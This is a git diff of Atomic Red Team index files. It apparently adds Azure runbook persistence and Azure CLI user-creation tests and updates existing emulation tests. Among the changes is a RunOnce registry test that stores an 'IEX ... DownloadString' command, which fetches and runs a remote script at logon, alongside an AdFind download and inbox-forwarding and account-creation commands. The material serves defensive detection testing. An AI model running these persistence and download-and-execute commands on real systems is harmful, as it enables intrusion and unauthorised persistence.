 persistence,T1098,Account Manipulation,2,Domain Account and Group Manipulate,a55a22e9-a3d3-42ce-bd48-2653adb8f7a9,powershell
 persistence,T1098,Account Manipulation,3,AWS - Create a group and add a user to that group,8822c3b0-d9f9-4daf-a043-49f110a31122,sh
@@ -917,6 +920,7 @@ persistence,T1037.001,Boot or Logon Initialization Scripts: Logon Script (Window
 persistence,T1137.002,Office Application Startup: Office Test,1,Office Application Startup Test Persistence (HKCU),c3e35b58-fe1c-480b-b540-7600fb612563,powershell
 persistence,T1547.008,Boot or Logon Autostart Execution: LSASS Driver,1,Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt,8ecef16d-d289-46b4-917b-0dba6dc81cf1,powershell
 persistence,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
+persistence,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
 persistence,T1053.002,Scheduled Task/Job: At,1,At.exe Scheduled task,4a6c0dc4-0f2a-4203-9298-a5a9bdc21ed8,command_prompt
 persistence,T1053.002,Scheduled Task/Job: At,2,At - Schedule a job,7266d898-ac82-4ec0-97c7-436075d0d08e,sh
 persistence,T1546.007,Event Triggered Execution: Netsh Helper DLL,1,Netsh Helper DLL Registration,3244697d-5a3a-4dfc-941c-550f69f91a4d,command_prompt
@@ -1497,6 +1501,7 @@ initial-access,T1195,Supply Chain Compromise,1,Octopus Scanner Malware Open Sour
 initial-access,T1078.001,Valid Accounts: Default Accounts,1,Enable Guest account with RDP capability and admin privileges,99747561-ed8d-47f2-9c91-1e5fde1ed6e0,command_prompt
 initial-access,T1078.001,Valid Accounts: Default Accounts,2,Activate Guest Account,aa6cb8c4-b582-4f8e-b677-37733914abda,command_prompt
 initial-access,T1078.004,Valid Accounts: Cloud Accounts,1,Creating GCP Service Account and Service Account Key,9fdd83fd-bd53-46e5-a716-9dec89c8ae8e,sh
+initial-access,T1078.004,Valid Accounts: Cloud Accounts,2,Azure Persistence Automation Runbook Created or Modified,348f4d14-4bd3-4f6b-bd8a-61237f78b3ac,powershell
 initial-access,T1078.003,Valid Accounts: Local Accounts,1,Create local account with admin privileges,a524ce99-86de-4db6-b4f9-e08f35a47a15,command_prompt
 initial-access,T1078.003,Valid Accounts: Local Accounts,2,Create local account with admin privileges - MacOS,f1275566-1c26-4b66-83e3-7f9f7f964daa,bash
 initial-access,T1078.003,Valid Accounts: Local Accounts,3,WinPwn - Loot local Credentials - powerhell kittie,9e9fd066-453d-442f-88c1-ad7911d32912,powershell

atomics/Indexes/Indexes-Markdown/azure-ad-index.md

@@ -60,7 +60,8 @@
   - Atomic Test #1: Azure AD Application Hijacking - Service Principal [azure-ad]
   - Atomic Test #2: Azure AD Application Hijacking - App Registration [azure-ad]
 - [T1136.003 Create Account: Cloud Account](../../T1136.003/T1136.003.md)
-  - Atomic Test #2: Azure AD - Create a new use [azure-ad]
+  - Atomic Test #2: Azure AD - Create a new user [azure-ad]
+  - Atomic Test #3: Azure AD - Create a new user via Azure CLI [azure-ad]
 - [T1098 Account Manipulation](../../T1098/T1098.md)
   - Atomic Test #4: Azure AD - adding user to Azure AD role [azure-ad]
   - Atomic Test #5: Azure AD - adding service principal to Azure AD role [azure-ad]

atomics/Indexes/Indexes-Markdown/iaas-index.md

@@ -22,6 +22,7 @@
 - T1578.001 Create Snapshot [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
   - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
+  - Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
 
 # credential-access
 - T1110.001 Brute Force: Password Guessing [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -94,6 +95,7 @@
 - T1136 Create Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
   - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
+  - Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
 
 # collection
 - T1119 Automated Collection [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -112,6 +114,7 @@
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
   - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
+  - Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
 
 # lateral-movement
 - T1550 Use Alternate Authentication Material [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
@@ -122,6 +125,7 @@
 - T1078 Valid Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
   - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
+  - Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
 
 # execution
 - T1204 User Execution [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)

atomics/Indexes/Indexes-Markdown/index.md

@@ -643,6 +643,7 @@
 - T1550.001 Application Access Token [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
   - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
+  - Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
 - T1480.001 Environmental Keying [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1564.004 Hide Artifacts: NTFS File Attributes](../../T1564.004/T1564.004.md)
   - Atomic Test #1: Alternate Data Streams (ADS) [windows]
@@ -972,6 +973,7 @@
   - Atomic Test #1: Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt [windows]
 - [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
   - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
+  - Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
 - [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
   - Atomic Test #1: At.exe Scheduled task [windows]
   - Atomic Test #2: At - Schedule a job [linux]
@@ -1371,7 +1373,8 @@
   - Atomic Test #16: secedit used to create a Run key in the HKLM Hive [windows]
 - [T1136.003 Create Account: Cloud Account](../../T1136.003/T1136.003.md)
   - Atomic Test #1: AWS - Create a new IAM user [iaas:aws]
-  - Atomic Test #2: Azure AD - Create a new use [azure-ad]
+  - Atomic Test #2: Azure AD - Create a new user [azure-ad]
+  - Atomic Test #3: Azure AD - Create a new user via Azure CLI [azure-ad]
 - [T1098 Account Manipulation](../../T1098/T1098.md)
   - Atomic Test #1: Admin Account Manipulate [windows]
   - Atomic Test #2: Domain Account and Group Manipulate [windows]
@@ -1476,6 +1479,7 @@
   - Atomic Test #1: Modify Registry to load Arbitrary DLL into LSASS - LsaDbExtPt [windows]
 - [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
   - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
+  - Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
 - [T1053.002 Scheduled Task/Job: At](../../T1053.002/T1053.002.md)
   - Atomic Test #1: At.exe Scheduled task [windows]
   - Atomic Test #2: At - Schedule a job [linux]
@@ -2445,6 +2449,7 @@
 - T1189 Drive-by Compromise [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.004 Valid Accounts: Cloud Accounts](../../T1078.004/T1078.004.md)
   - Atomic Test #1: Creating GCP Service Account and Service Account Key [google-workspace, iaas:gcp]
+  - Atomic Test #2: Azure Persistence Automation Runbook Created or Modified [iaas:azure]
 - T1566.003 Spearphishing via Service [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
 - [T1078.003 Valid Accounts: Local Accounts](../../T1078.003/T1078.003.md)
   - Atomic Test #1: Create local account with admin privileges [windows]

atomics/Indexes/azure-ad-index.yaml

@@ -36519,7 +36519,7 @@ persistence:
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1136.003
     atomic_tests:
-    - name: Azure AD - Create a new use
+    - name: Azure AD - Create a new user
       auto_generated_guid: e62d23ef-3153-4837-8625-fa4a3829134d
       description: Creates a new user in Azure AD. Upon successful creation, a new
         user will be created. Adversaries create new users so that their malicious
@@ -36562,6 +36562,52 @@ persistence:
           $username      "
         cleanup_command: Remove-AzureADUser -ObjectId "#{userprincipalname}"
         name: powershell
+    - name: Azure AD - Create a new user via Azure CLI
+      auto_generated_guid: 228c7498-be31-48e9-83b7-9cb906504ec8
+      description: Creates a new user in Azure AD via the Azure CLI. Upon successful
+        creation, a new user will be created. Adversaries create new users so that
+        their malicious activity does not interrupt the normal functions of the compromised
+        users and can remain undetected for a long time.
+      supported_platforms:
+      - azure-ad
+      input_arguments:
+        username:
+          description: Display name of the new user to be created in Azure AD
+          type: string
+          default: atomicredteam
+        userprincipalname:
+          description: User principal name (UPN) for the new Azure user being created
+            format email address
+          type: String
+          default: atomicredteam@yourdomain.com
+        password:
+          description: Password for the new Azure AD user being created
+          type: string
+          default: reallylongcredential12345ART-ydsfghsdgfhsdgfhgsdhfg
+      dependency_executor_name: powershell
+      dependencies:
+      - description: Check if Azure CLI is installed and install manually
+        prereq_command: az account list
+        get_prereq_command: echo "use the following to install the Azure CLI manually
+          https://aka.ms/installazurecliwindows"
+      - description: Check if Azure CLI is installed and install via PowerShell
+        prereq_command: az account list
+        get_prereq_command: echo "use the following to install the Azure CLI $ProgressPreference
+          = 'SilentlyContinue'; Invoke-WebRequest -Uri https://aka.ms/installazurecliwindows
+          -OutFile .\AzureCLI.msi; Start-Process msiexec.exe -Wait -ArgumentList '/I
+          AzureCLI.msi /quiet'; Remove-Item .\AzureCLI.msi"
+      - description: Update the userprincipalname to meet your requirements
+        prereq_command: Update the input arguments so the userprincipalname value
+          is accurate for your environment
+        get_prereq_command: echo "Update the input arguments in the .yaml file so
+          that the userprincipalname value is accurate for your environment"
+      executor:
+        command: "az login\n$userprincipalname = \"#{userprincipalname}\"\n$username
+          = \"#{username}\"      \n$password = \"#{password}\"\naz ad user create
+          --display-name $username --password $password --user-principal-name $userprincipalname\naz
+          ad user list --filter \"displayname eq 'atomicredteam'\"     "
+        cleanup_command: az ad user delete --id
+        name: powershell
   T1098:
     technique:
       x_mitre_platforms:

atomics/Indexes/iaas_azure-index.yaml

@@ -14090,7 +14090,56 @@ defense-evasion:
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1078.004
-    atomic_tests: []
+    atomic_tests:
+    - name: Azure Persistence Automation Runbook Created or Modified
+      auto_generated_guid: 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac
+      description: |
+        Identifies when an Azure Automation runbook is created or modified. An adversary may create or modify an Azure
+        Automation runbook to execute malicious code and maintain persistence in their target's environment.
+      supported_platforms:
+      - iaas:azure
+      input_arguments:
+        username:
+          description: Azure username
+          type: String
+          default: 
+        password:
+          description: Azure password
+          type: String
+          default: 
+        resource_group:
+          description: Name of the resource group
+          type: String
+          default: 
+        runbook_name:
+          description: Name of the runbook name
+          type: String
+          default: 
+        automation_account_name:
+          description: Name of the automation account name
+          type: String
+          default: 
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Install-Module -Name Az
+
+          '
+        prereq_command: 'try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
+          {exit 0} else {exit 1}} catch {exit 1}
+
+          '
+        get_prereq_command: 'Install-Module -Name Az -Scope CurrentUser -Force
+
+          '
+      executor:
+        command: |
+          $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+          $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+          Connect-AzAccount -Credential $creds
+          New-AzAutomationRunbook -Name #{runbook_name} -Type PowerShell -ResourceGroupName #{resource_group} -Description 'my-test-runbook' -AutomationAccountName #{automation_account_name}
+          Remove-AzAutomationRunbook -AutomationAccountName #{automation_account_name} -Name #{runbook_name} -ResourceGroupName #{resource_group} -Force
+        name: powershell
+        elevation_required: false
   T1480.001:
     technique:
       x_mitre_platforms:
@@ -24323,7 +24372,56 @@ privilege-escalation:
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1078.004
-    atomic_tests: []
+    atomic_tests:
+    - name: Azure Persistence Automation Runbook Created or Modified
+      auto_generated_guid: 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac
+      description: |
+        Identifies when an Azure Automation runbook is created or modified. An adversary may create or modify an Azure
+        Automation runbook to execute malicious code and maintain persistence in their target's environment.
+      supported_platforms:
+      - iaas:azure
+      input_arguments:
+        username:
+          description: Azure username
+          type: String
+          default: 
+        password:
+          description: Azure password
+          type: String
+          default: 
+        resource_group:
+          description: Name of the resource group
+          type: String
+          default: 
+        runbook_name:
+          description: Name of the runbook name
+          type: String
+          default: 
+        automation_account_name:
+          description: Name of the automation account name
+          type: String
+          default: 
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Install-Module -Name Az
+
+          '
+        prereq_command: 'try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
+          {exit 0} else {exit 1}} catch {exit 1}
+
+          '
+        get_prereq_command: 'Install-Module -Name Az -Scope CurrentUser -Force
+
+          '
+      executor:
+        command: |
+          $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+          $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+          Connect-AzAccount -Credential $creds
+          New-AzAutomationRunbook -Name #{runbook_name} -Type PowerShell -ResourceGroupName #{resource_group} -Description 'my-test-runbook' -AutomationAccountName #{automation_account_name}
+          Remove-AzAutomationRunbook -AutomationAccountName #{automation_account_name} -Name #{runbook_name} -ResourceGroupName #{resource_group} -Force
+        name: powershell
+        elevation_required: false
   T1053.002:
     technique:
       x_mitre_platforms:
@@ -39931,7 +40029,56 @@ persistence:
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1078.004
-    atomic_tests: []
+    atomic_tests:
+    - name: Azure Persistence Automation Runbook Created or Modified
+      auto_generated_guid: 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac
+      description: |
+        Identifies when an Azure Automation runbook is created or modified. An adversary may create or modify an Azure
+        Automation runbook to execute malicious code and maintain persistence in their target's environment.
+      supported_platforms:
+      - iaas:azure
+      input_arguments:
+        username:
+          description: Azure username
+          type: String
+          default: 
+        password:
+          description: Azure password
+          type: String
+          default: 
+        resource_group:
+          description: Name of the resource group
+          type: String
+          default: 
+        runbook_name:
+          description: Name of the runbook name
+          type: String
+          default: 
+        automation_account_name:
+          description: Name of the automation account name
+          type: String
+          default: 
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Install-Module -Name Az
+
+          '
+        prereq_command: 'try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
+          {exit 0} else {exit 1}} catch {exit 1}
+
+          '
+        get_prereq_command: 'Install-Module -Name Az -Scope CurrentUser -Force
+
+          '
+      executor:
+        command: |
+          $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+          $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+          Connect-AzAccount -Credential $creds
+          New-AzAutomationRunbook -Name #{runbook_name} -Type PowerShell -ResourceGroupName #{resource_group} -Description 'my-test-runbook' -AutomationAccountName #{automation_account_name}
+          Remove-AzAutomationRunbook -AutomationAccountName #{automation_account_name} -Name #{runbook_name} -ResourceGroupName #{resource_group} -Force
+        name: powershell
+        elevation_required: false
   T1053.002:
     technique:
       x_mitre_platforms:
@@ -63244,7 +63391,56 @@ initial-access:
       x_mitre_attack_spec_version: 2.1.0
       x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
       identifier: T1078.004
-    atomic_tests: []
+    atomic_tests:
+    - name: Azure Persistence Automation Runbook Created or Modified
+      auto_generated_guid: 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac
+      description: |
+        Identifies when an Azure Automation runbook is created or modified. An adversary may create or modify an Azure
+        Automation runbook to execute malicious code and maintain persistence in their target's environment.
+      supported_platforms:
+      - iaas:azure
+      input_arguments:
+        username:
+          description: Azure username
+          type: String
+          default: 
+        password:
+          description: Azure password
+          type: String
+          default: 
+        resource_group:
+          description: Name of the resource group
+          type: String
+          default: 
+        runbook_name:
+          description: Name of the runbook name
+          type: String
+          default: 
+        automation_account_name:
+          description: Name of the automation account name
+          type: String
+          default: 
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Install-Module -Name Az
+
+          '
+        prereq_command: 'try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
+          {exit 0} else {exit 1}} catch {exit 1}
+
+          '
+        get_prereq_command: 'Install-Module -Name Az -Scope CurrentUser -Force
+
+          '
+      executor:
+        command: |
+          $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+          $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+          Connect-AzAccount -Credential $creds
+          New-AzAutomationRunbook -Name #{runbook_name} -Type PowerShell -ResourceGroupName #{resource_group} -Description 'my-test-runbook' -AutomationAccountName #{automation_account_name}
+          Remove-AzAutomationRunbook -AutomationAccountName #{automation_account_name} -Name #{runbook_name} -ResourceGroupName #{resource_group} -Force
+        name: powershell
+        elevation_required: false
   T1566.003:
     technique:
       x_mitre_platforms:

atomics/Indexes/index.yaml

@@ -26123,6 +26123,55 @@ defense-evasion:
           this atomic test : https://cloud.google.com/sdk/docs/install"
 
           '
+    - name: Azure Persistence Automation Runbook Created or Modified
+      auto_generated_guid: 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac
+      description: |
+        Identifies when an Azure Automation runbook is created or modified. An adversary may create or modify an Azure
+        Automation runbook to execute malicious code and maintain persistence in their target's environment.
+      supported_platforms:
+      - iaas:azure
+      input_arguments:
+        username:
+          description: Azure username
+          type: String
+          default: 
+        password:
+          description: Azure password
+          type: String
+          default: 
+        resource_group:
+          description: Name of the resource group
+          type: String
+          default: 
+        runbook_name:
+          description: Name of the runbook name
+          type: String
+          default: 
+        automation_account_name:
+          description: Name of the automation account name
+          type: String
+          default: 
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Install-Module -Name Az
+
+          '
+        prereq_command: 'try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
+          {exit 0} else {exit 1}} catch {exit 1}
+
+          '
+        get_prereq_command: 'Install-Module -Name Az -Scope CurrentUser -Force
+
+          '
+      executor:
+        command: |
+          $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+          $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+          Connect-AzAccount -Credential $creds
+          New-AzAutomationRunbook -Name #{runbook_name} -Type PowerShell -ResourceGroupName #{resource_group} -Description 'my-test-runbook' -AutomationAccountName #{automation_account_name}
+          Remove-AzAutomationRunbook -AutomationAccountName #{automation_account_name} -Name #{runbook_name} -ResourceGroupName #{resource_group} -Force
+        name: powershell
+        elevation_required: false
   T1480.001:
     technique:
       x_mitre_platforms:
@@ -37161,7 +37210,7 @@ privilege-escalation:
       executor:
         command: |
           $RunOnceKey = "#{reg_key_path}"
-          set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`")"'
+          set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1547.001/src/Discovery.bat`")"'
         cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun"
           -Force -ErrorAction Ignore
 
@@ -37211,7 +37260,8 @@ privilege-escalation:
     - name: Suspicious bat file run from startup Folder
       auto_generated_guid: 5b6768e4-44d2-44f0-89da-a01d1430fd5e
       description: |
-        bat files can be placed in and executed from the startup folder to maintain persistance.
+        bat files can be placed in and executed from the startup folder to maintain persistance
+
         Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
         folder and will also run when the computer is restarted and the user logs in.
       supported_platforms:
@@ -41935,6 +41985,55 @@ privilege-escalation:
           this atomic test : https://cloud.google.com/sdk/docs/install"
 
           '
+    - name: Azure Persistence Automation Runbook Created or Modified
+      auto_generated_guid: 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac
+      description: |
+        Identifies when an Azure Automation runbook is created or modified. An adversary may create or modify an Azure
+        Automation runbook to execute malicious code and maintain persistence in their target's environment.
+      supported_platforms:
+      - iaas:azure
+      input_arguments:
+        username:
+          description: Azure username
+          type: String
+          default: 
+        password:
+          description: Azure password
+          type: String
+          default: 
+        resource_group:
+          description: Name of the resource group
+          type: String
+          default: 
+        runbook_name:
+          description: Name of the runbook name
+          type: String
+          default: 
+        automation_account_name:
+          description: Name of the automation account name
+          type: String
+          default: 
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Install-Module -Name Az
+
+          '
+        prereq_command: 'try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
+          {exit 0} else {exit 1}} catch {exit 1}
+
+          '
+        get_prereq_command: 'Install-Module -Name Az -Scope CurrentUser -Force
+
+          '
+      executor:
+        command: |
+          $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+          $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+          Connect-AzAccount -Credential $creds
+          New-AzAutomationRunbook -Name #{runbook_name} -Type PowerShell -ResourceGroupName #{resource_group} -Description 'my-test-runbook' -AutomationAccountName #{automation_account_name}
+          Remove-AzAutomationRunbook -AutomationAccountName #{automation_account_name} -Name #{runbook_name} -ResourceGroupName #{resource_group} -Force
+        name: powershell
+        elevation_required: false
   T1053.002:
     technique:
       x_mitre_platforms:
@@ -60101,7 +60200,7 @@ persistence:
       executor:
         command: |
           $RunOnceKey = "#{reg_key_path}"
-          set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/36f83b728bc26a49eacb0535edc42be8c377ac54/ARTifacts/Misc/Discovery.bat`")"'
+          set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1547.001/src/Discovery.bat`")"'
         cleanup_command: 'Remove-ItemProperty -Path #{reg_key_path} -Name "NextRun"
           -Force -ErrorAction Ignore
 
@@ -60151,7 +60250,8 @@ persistence:
     - name: Suspicious bat file run from startup Folder
       auto_generated_guid: 5b6768e4-44d2-44f0-89da-a01d1430fd5e
       description: |
-        bat files can be placed in and executed from the startup folder to maintain persistance.
+        bat files can be placed in and executed from the startup folder to maintain persistance
+
         Upon execution, cmd will be run and immediately closed. Additionally, the new files can be viewed in the "$env:APPDATA\Microsoft\Windows\Start Menu\Programs\Startup"
         folder and will also run when the computer is restarted and the user logs in.
       supported_platforms:
@@ -60499,7 +60599,7 @@ persistence:
           '
         name: sh
         elevation_required: false
-    - name: Azure AD - Create a new use
+    - name: Azure AD - Create a new user
       auto_generated_guid: e62d23ef-3153-4837-8625-fa4a3829134d
       description: Creates a new user in Azure AD. Upon successful creation, a new
         user will be created. Adversaries create new users so that their malicious
@@ -60542,6 +60642,52 @@ persistence:
           $username      "
         cleanup_command: Remove-AzureADUser -ObjectId "#{userprincipalname}"
         name: powershell
+    - name: Azure AD - Create a new user via Azure CLI
+      auto_generated_guid: 228c7498-be31-48e9-83b7-9cb906504ec8
+      description: Creates a new user in Azure AD via the Azure CLI. Upon successful
+        creation, a new user will be created. Adversaries create new users so that
+        their malicious activity does not interrupt the normal functions of the compromised
+        users and can remain undetected for a long time.
+      supported_platforms:
+      - azure-ad
+      input_arguments:
+        username:
+          description: Display name of the new user to be created in Azure AD
+          type: string
+          default: atomicredteam
+        userprincipalname:
+          description: User principal name (UPN) for the new Azure user being created
+            format email address
+          type: String
+          default: atomicredteam@yourdomain.com
+        password:
+          description: Password for the new Azure AD user being created
+          type: string
+          default: reallylongcredential12345ART-ydsfghsdgfhsdgfhgsdhfg
+      dependency_executor_name: powershell
+      dependencies:
+      - description: Check if Azure CLI is installed and install manually
+        prereq_command: az account list
+        get_prereq_command: echo "use the following to install the Azure CLI manually
+          https://aka.ms/installazurecliwindows"
+      - description: Check if Azure CLI is installed and install via PowerShell
+        prereq_command: az account list
+        get_prereq_command: echo "use the following to install the Azure CLI $ProgressPreference
+          = 'SilentlyContinue'; Invoke-WebRequest -Uri https://aka.ms/installazurecliwindows
+          -OutFile .\AzureCLI.msi; Start-Process msiexec.exe -Wait -ArgumentList '/I
+          AzureCLI.msi /quiet'; Remove-Item .\AzureCLI.msi"
+      - description: Update the userprincipalname to meet your requirements
+        prereq_command: Update the input arguments so the userprincipalname value
+          is accurate for your environment
+        get_prereq_command: echo "Update the input arguments in the .yaml file so
+          that the userprincipalname value is accurate for your environment"
+      executor:
+        command: "az login\n$userprincipalname = \"#{userprincipalname}\"\n$username
+          = \"#{username}\"      \n$password = \"#{password}\"\naz ad user create
+          --display-name $username --password $password --user-principal-name $userprincipalname\naz
+          ad user list --filter \"displayname eq 'atomicredteam'\"     "
+        cleanup_command: az ad user delete --id
+        name: powershell
   T1098:
     technique:
       x_mitre_platforms:
@@ -66109,6 +66255,55 @@ persistence:
           this atomic test : https://cloud.google.com/sdk/docs/install"
 
           '
+    - name: Azure Persistence Automation Runbook Created or Modified
+      auto_generated_guid: 348f4d14-4bd3-4f6b-bd8a-61237f78b3ac
+      description: |
+        Identifies when an Azure Automation runbook is created or modified. An adversary may create or modify an Azure
+        Automation runbook to execute malicious code and maintain persistence in their target's environment.
+      supported_platforms:
+      - iaas:azure
+      input_arguments:
+        username:
+          description: Azure username
+          type: String
+          default: 
+        password:
+          description: Azure password
+          type: String
+          default: 
+        resource_group:
+          description: Name of the resource group
+          type: String
+          default: 
+        runbook_name:
+          description: Name of the runbook name
+          type: String
+          default: 
+        automation_account_name:
+          description: Name of the automation account name
+          type: String
+          default: 
+      dependency_executor_name: powershell
+      dependencies:
+      - description: 'Install-Module -Name Az
+
+          '
+        prereq_command: 'try {if (Get-InstalledModule -Name Az -ErrorAction SilentlyContinue)
+          {exit 0} else {exit 1}} catch {exit 1}
+
+          '
+        get_prereq_command: 'Install-Module -Name Az -Scope CurrentUser -Force
+
+          '
+      executor:
+        command: |
+          $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
+          $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
+          Connect-AzAccount -Credential $creds
+          New-AzAutomationRunbook -Name #{runbook_name} -Type PowerShell -ResourceGroupName #{resource_group} -Description 'my-test-runbook' -AutomationAccountName #{automation_account_name}
+          Remove-AzAutomationRunbook -AutomationAccountName #{automation_account_name} -Name #{runbook_name} -ResourceGroupName #{resource_group} -Force
+        name: powershell
+        elevation_required: false
   T1053.002:
     technique:
       x_mitre_platforms:
@@ -70043,7 +70238,7 @@ collection:
           $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
           $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
           Connect-ExchangeOnline -Credential $creds
-          New-InboxRule -Name "#{rule_name}" -ForwardTo "{#forwarding_email}"
+          New-InboxRule -Name "#{rule_name}" -ForwardTo "#{forwarding_email}"
         cleanup_command: |
           $secure_pwd = "#{password}" | ConvertTo-SecureString -AsPlainText -Force
           $creds = New-Object System.Management.Automation.PSCredential -ArgumentList "#{username}", $secure_pwd
@@ -84801,10 +84996,9 @@ discovery:
         prereq_command: 'if (Test-Path #{adfind_path}) {exit 0} else {exit 1}
 
           '
-        get_prereq_command: 'Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe"
-          -OutFile #{adfind_path}
-
-          '
+        get_prereq_command: |
+          New-Item -Type Directory (split-path #{adfind_path}) -ErrorAction ignore | Out-Null
+          Invoke-WebRequest -Uri "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe" -OutFile #{adfind_path}
       executor:
         command: "#{adfind_path} -default -s base lockoutduration lockoutthreshold
           lockoutobservationwindow maxpwdage minpwdage minpwdlength pwdhistorylength
